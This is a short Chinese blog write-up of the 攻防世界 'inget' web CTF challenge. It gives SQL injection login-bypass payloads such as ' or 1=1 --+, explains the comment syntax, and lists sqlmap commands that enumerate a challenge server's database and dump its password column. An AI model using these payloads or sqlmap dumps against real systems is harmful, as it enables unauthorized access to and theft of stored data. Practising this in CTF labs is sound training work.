攻防世界24-inget-Web
攻防世界24-inget-CTFWeb
解法1:
直接
?id=’ or 1=1 –+
或
?id=’ or ‘1=1
?id=’ or ‘1’=’1
–+是什么意思?当你只输入 id=' or 1=1 --
而不包含空格时,某些数据库可能会因为语法错误无法执行,因为 --
后面需要有一个空格才能正确地注释掉后续内容。
万能密码:
sql
1 | ' and '1'='1 |
解法2:
sqlmap使用https://blog.csdn.net/weixin_68416970/article/details/138974168
python sqlmap.py -u “http://61.147.171.105:50808/?id=1“ –dbs
python sqlmap.py -u “http://61.147.171.105:50808/?id=1“ -D cyber –tables
python sqlmap.py -u “http://61.147.171.105:50808/?id=1“ -D cyber -T cyber –columns
python sqlmap.py -u “http://61.147.171.105:50808/?id=1“ -D cyber -T cyber -C pw –dump
plaintext
1 | -D 选择使用哪个数据库 |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Matriy's blog!